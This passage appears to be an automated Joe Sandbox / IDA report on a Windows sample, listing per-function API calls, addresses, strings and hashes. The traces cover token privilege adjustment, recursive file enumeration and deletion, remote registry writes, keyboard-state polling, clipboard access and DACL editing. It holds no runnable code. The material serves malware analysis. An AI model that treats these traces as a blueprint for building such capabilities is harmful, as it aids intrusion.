                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FF83CD
                                                                      • GetProcessWindowStation.USER32 ref: 00FF83E6
                                                                      • SetProcessWindowStation.USER32(00000000), ref: 00FF83F0
                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FF840A
                                                                        • Part of subcall function 00FF81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FF8309), ref: 00FF81E0
                                                                        • Part of subcall function 00FF81CB: CloseHandle.KERNEL32(?,?,00FF8309), ref: 00FF81F2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                      • String ID: $default$winsta0
                                                                      • API String ID: 2063423040-1027155976
                                                                      • Opcode ID: 4e362bfc180a485427053e4d35783ce20d49df79acb3068735486edbbac2cbc0
                                                                      • Instruction ID: 343d42f2dfeac4226da4466b4da05c3b8b292da78cc2ee490f5d08e77a6c599f
                                                                      • Opcode Fuzzy Hash: 4e362bfc180a485427053e4d35783ce20d49df79acb3068735486edbbac2cbc0
                                                                      • Instruction Fuzzy Hash: 48814B7190020DAFDF219FA4DC45AFE7B79FF083A4F284159FA50A6161DB358E16EB20
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0100C78D
                                                                      • FindClose.KERNEL32(00000000), ref: 0100C7E1
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0100C806
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0100C81D
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0100C844
                                                                      • __swprintf.LIBCMT ref: 0100C890
                                                                      • __swprintf.LIBCMT ref: 0100C8D3
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                      • __swprintf.LIBCMT ref: 0100C927
                                                                        • Part of subcall function 00FC3698: __woutput_l.LIBCMT ref: 00FC36F1
                                                                      • __swprintf.LIBCMT ref: 0100C975
                                                                        • Part of subcall function 00FC3698: __flsbuf.LIBCMT ref: 00FC3713
                                                                        • Part of subcall function 00FC3698: __flsbuf.LIBCMT ref: 00FC372B
                                                                      • __swprintf.LIBCMT ref: 0100C9C4
                                                                      • __swprintf.LIBCMT ref: 0100CA13
                                                                      • __swprintf.LIBCMT ref: 0100CA62
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                      • API String ID: 3953360268-2428617273
                                                                      • Opcode ID: ca35dec9951b1c07f7cae43fa449c72071723845c95491dd1d9b09e09abd3f22
                                                                      • Instruction ID: 931bfea6bd61ae1e48b98c006d44b33fcf81b961295475ec45ac8ecb3667b870
                                                                      • Opcode Fuzzy Hash: ca35dec9951b1c07f7cae43fa449c72071723845c95491dd1d9b09e09abd3f22
                                                                      • Instruction Fuzzy Hash: 97A14DB1408305ABD710EFA4CD86DAFB7ECFF86704F40492DF58586191EA78DA08DB62
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0100EFB6
                                                                      • _wcscmp.LIBCMT ref: 0100EFCB
                                                                      • _wcscmp.LIBCMT ref: 0100EFE2
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0100EFF4
                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 0100F00E
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0100F026
                                                                      • FindClose.KERNEL32(00000000), ref: 0100F031
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0100F04D
                                                                      • _wcscmp.LIBCMT ref: 0100F074
                                                                      • _wcscmp.LIBCMT ref: 0100F08B
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0100F09D
                                                                      • SetCurrentDirectoryW.KERNEL32(01058920), ref: 0100F0BB
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0100F0C5
                                                                      • FindClose.KERNEL32(00000000), ref: 0100F0D2
                                                                      • FindClose.KERNEL32(00000000), ref: 0100F0E4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                      • String ID: *.*
                                                                      • API String ID: 1803514871-438819550
                                                                      • Opcode ID: b80ebc849bd7e6774230a8eb3d589e79df4de328f4a02226f963f1b47548498e
                                                                      • Instruction ID: a7903ec25ce68b7e746fee253bc0f6d454868357a3f9fa740d5e6f6907ebbca9
                                                                      • Opcode Fuzzy Hash: b80ebc849bd7e6774230a8eb3d589e79df4de328f4a02226f963f1b47548498e
                                                                      • Instruction Fuzzy Hash: B931F43250021B6BEB31EEA5DC49EEE77FC9F452A0F14419AF984E2090DB35DA44DB50
                                                                      APIs
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01020953
                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0102F910,00000000,?,00000000,?,?), ref: 010209C1
                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01020A09
                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01020A92
                                                                      • RegCloseKey.ADVAPI32(?), ref: 01020DB2
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 01020DBF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectCreateRegistryValue
                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                      • API String ID: 536824911-966354055
                                                                      • Opcode ID: 9dfcf9985993bec03e24709a966fc37b606f5af798c4618422942e40d2919295
                                                                      • Instruction ID: 0e341d9e5c0d9f79f080165de07775785d241d70eff21a732e4ae3e4d6849533
                                                                      • Opcode Fuzzy Hash: 9dfcf9985993bec03e24709a966fc37b606f5af798c4618422942e40d2919295
                                                                      • Instruction Fuzzy Hash: 770259756046119FDB54EF18C881E2AB7E5FF8A314F04846DF98A9B362CB78ED01DB81
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0100F113
                                                                      • _wcscmp.LIBCMT ref: 0100F128
                                                                      • _wcscmp.LIBCMT ref: 0100F13F
                                                                        • Part of subcall function 01004385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 010043A0
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0100F16E
                                                                      • FindClose.KERNEL32(00000000), ref: 0100F179
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0100F195
                                                                      • _wcscmp.LIBCMT ref: 0100F1BC
                                                                      • _wcscmp.LIBCMT ref: 0100F1D3
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0100F1E5
                                                                      • SetCurrentDirectoryW.KERNEL32(01058920), ref: 0100F203
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0100F20D
                                                                      • FindClose.KERNEL32(00000000), ref: 0100F21A
                                                                      • FindClose.KERNEL32(00000000), ref: 0100F22C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                      • String ID: *.*
                                                                      • API String ID: 1824444939-438819550
                                                                      • Opcode ID: e0b9251d9f21f244c75fed19720a8574cedd44898b61f5f71d77ac7f219a1c35
                                                                      • Instruction ID: 7b7b9736f43d731fca2f758f3501b8a941cc16de2233ef878a82ae24404b9cc1
                                                                      • Opcode Fuzzy Hash: e0b9251d9f21f244c75fed19720a8574cedd44898b61f5f71d77ac7f219a1c35
                                                                      • Instruction Fuzzy Hash: 9731483650021B7BEB32EEA8EC49EDE77BC9F462A0F144199E980E20D0DB35DA44DB54
                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0100A20F
                                                                      • __swprintf.LIBCMT ref: 0100A231
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0100A26E
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0100A293
                                                                      • _memset.LIBCMT ref: 0100A2B2
                                                                      • _wcsncpy.LIBCMT ref: 0100A2EE
                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0100A323
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0100A32E
                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 0100A337
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0100A341
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                      • String ID: :$\$\??\%s
                                                                      • API String ID: 2733774712-3457252023
                                                                      • Opcode ID: bd371c39ec16f3082b3b2e8187dcc58826f531a071f37454338fa6020e241760
                                                                      • Instruction ID: a460a54c674edf53c5b236379cd806aa9e01ea84f83c734dd5732a822f50802e
                                                                      • Opcode Fuzzy Hash: bd371c39ec16f3082b3b2e8187dcc58826f531a071f37454338fa6020e241760
                                                                      • Instruction Fuzzy Hash: B831C37160020AABEB31DFA4DC49FEB37BCEF89740F1041B6FA49D2190EB7592448B24
                                                                      APIs
                                                                        • Part of subcall function 00FF8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FF821E
                                                                        • Part of subcall function 00FF8202: GetLastError.KERNEL32(?,00FF7CE2,?,?,?), ref: 00FF8228
                                                                        • Part of subcall function 00FF8202: GetProcessHeap.KERNEL32(00000008,?,?,00FF7CE2,?,?,?), ref: 00FF8237
                                                                        • Part of subcall function 00FF8202: HeapAlloc.KERNEL32(00000000,?,00FF7CE2,?,?,?), ref: 00FF823E
                                                                        • Part of subcall function 00FF8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FF8255
                                                                        • Part of subcall function 00FF829F: GetProcessHeap.KERNEL32(00000008,00FF7CF8,00000000,00000000,?,00FF7CF8,?), ref: 00FF82AB
                                                                        • Part of subcall function 00FF829F: HeapAlloc.KERNEL32(00000000,?,00FF7CF8,?), ref: 00FF82B2
                                                                        • Part of subcall function 00FF829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FF7CF8,?), ref: 00FF82C3
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FF7D13
                                                                      • _memset.LIBCMT ref: 00FF7D28
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FF7D47
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00FF7D58
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00FF7D95
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FF7DB1
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00FF7DCE
                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FF7DDD
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00FF7DE4
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FF7E05
                                                                      • CopySid.ADVAPI32(00000000), ref: 00FF7E0C
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FF7E3D
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FF7E63
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FF7E77
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                      • String ID:
                                                                      • API String ID: 3996160137-0
                                                                      • Opcode ID: 50a047ec84e28b4e85e25dc986db6943bc918944afb45f9e2b4415b08e0bde73
                                                                      • Instruction ID: e9045246318ae1338ff3d92b9ca423175f03e772de8ace82c5bcbbcd2d0e7f5a
                                                                      • Opcode Fuzzy Hash: 50a047ec84e28b4e85e25dc986db6943bc918944afb45f9e2b4415b08e0bde73
                                                                      • Instruction Fuzzy Hash: A6615C7190020AAFDF209FA0DC85EBEFB79FF04750F14815AFA15A6290DB399A05DB60
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                      • API String ID: 0-4052911093
                                                                      • Opcode ID: aa3c1376444f65c066839e952ec9ca4e0f394484d103e2930eeb6f3b775765b0
                                                                      • Instruction ID: e3e9a64ca60cba25b6267887289849cc1f2cc6d6f501cae8058147f86573a48c
                                                                      • Opcode Fuzzy Hash: aa3c1376444f65c066839e952ec9ca4e0f394484d103e2930eeb6f3b775765b0
                                                                      • Instruction Fuzzy Hash: A2724DB5E00219DBDB24CF59C8807FEB7B5BF44720F24816AE949EB290DB349941EF90
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 01000097
                                                                      • SetKeyboardState.USER32(?), ref: 01000102
                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 01000122
                                                                      • GetKeyState.USER32(000000A0), ref: 01000139
                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 01000168
                                                                      • GetKeyState.USER32(000000A1), ref: 01000179
                                                                      • GetAsyncKeyState.USER32(00000011), ref: 010001A5
                                                                      • GetKeyState.USER32(00000011), ref: 010001B3
                                                                      • GetAsyncKeyState.USER32(00000012), ref: 010001DC
                                                                      • GetKeyState.USER32(00000012), ref: 010001EA
                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 01000213
                                                                      • GetKeyState.USER32(0000005B), ref: 01000221
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: d6be4d8be4fb27b002b83c80ae8b1999ee5dbdefaafed7b5d50eaab9ab44a1eb
                                                                      • Instruction ID: cfdbd3c827603eb776450619f179da07343ff48784ec00488a3b590b1397e314
                                                                      • Opcode Fuzzy Hash: d6be4d8be4fb27b002b83c80ae8b1999ee5dbdefaafed7b5d50eaab9ab44a1eb
                                                                      • Instruction Fuzzy Hash: 9351F83090478929FB77DBA888147EABFF49F022C0F0845DEE6C6565C7DAA4978CC761
                                                                      APIs
                                                                        • Part of subcall function 01020E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010204AC
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0102054B
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 010205E3
                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01020822
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0102082F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 1240663315-0
                                                                      • Opcode ID: 8c92f0abbac997c4a1f6ecbe8085b9d7dc263f91af299cac6473bd59c48f528c
                                                                      • Instruction ID: b1c91c5d906a95acdbc0a2d98e614de29387b64d8dd273b76aa7ffe5f0220598
                                                                      • Opcode Fuzzy Hash: 8c92f0abbac997c4a1f6ecbe8085b9d7dc263f91af299cac6473bd59c48f528c
                                                                      • Instruction Fuzzy Hash: 46E17B70604314AFCB14DF28C885E6BBBE4FF89714F04896DF88ADB265DA34E905CB91
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                      • String ID:
                                                                      • API String ID: 1737998785-0
                                                                      • Opcode ID: 0b4310cc4825c38a39b80cd52ae253495fbc51edcbc06ef9320cf37af7b9c6c2
                                                                      • Instruction ID: ea8c77509d30e780a68f56b836da90868b32d9bc4cdbc6a25b3655d383724202
                                                                      • Opcode Fuzzy Hash: 0b4310cc4825c38a39b80cd52ae253495fbc51edcbc06ef9320cf37af7b9c6c2
                                                                      • Instruction Fuzzy Hash: 632180753002119FDB31AF64DC09B6D7BA8EF06750F14801AF986DB265DB7DA800CB54
                                                                      APIs
                                                                        • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
                                                                        • Part of subcall function 01004A31: GetFileAttributesW.KERNEL32(?,0100370B), ref: 01004A32
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 010038A3
                                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0100394B
                                                                      • MoveFileW.KERNEL32(?,?), ref: 0100395E
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0100397B
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0100399D
                                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 010039B9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 4002782344-1173974218
                                                                      • Opcode ID: 67ddf9d8e18b467618a76196a07405ea6ca357344cca0717a92ca07040b3af0e
                                                                      • Instruction ID: de19aeda0325bf6101876369d64fa02f1fca59fa3dd1b79d35b17fce6afbe11e
                                                                      • Opcode Fuzzy Hash: 67ddf9d8e18b467618a76196a07405ea6ca357344cca0717a92ca07040b3af0e
                                                                      • Instruction Fuzzy Hash: 94519F7180414D9EDF17FBA4DE92DEEB7B9AF16300F6000A9E441BA191EB256F0DDB60
                                                                      APIs
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0100F440
                                                                      • Sleep.KERNEL32(0000000A), ref: 0100F470
                                                                      • _wcscmp.LIBCMT ref: 0100F484
                                                                      • _wcscmp.LIBCMT ref: 0100F49F
                                                                      • FindNextFileW.KERNEL32(?,?), ref: 0100F53D
                                                                      • FindClose.KERNEL32(00000000), ref: 0100F553
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                      • String ID: *.*
                                                                      • API String ID: 713712311-438819550
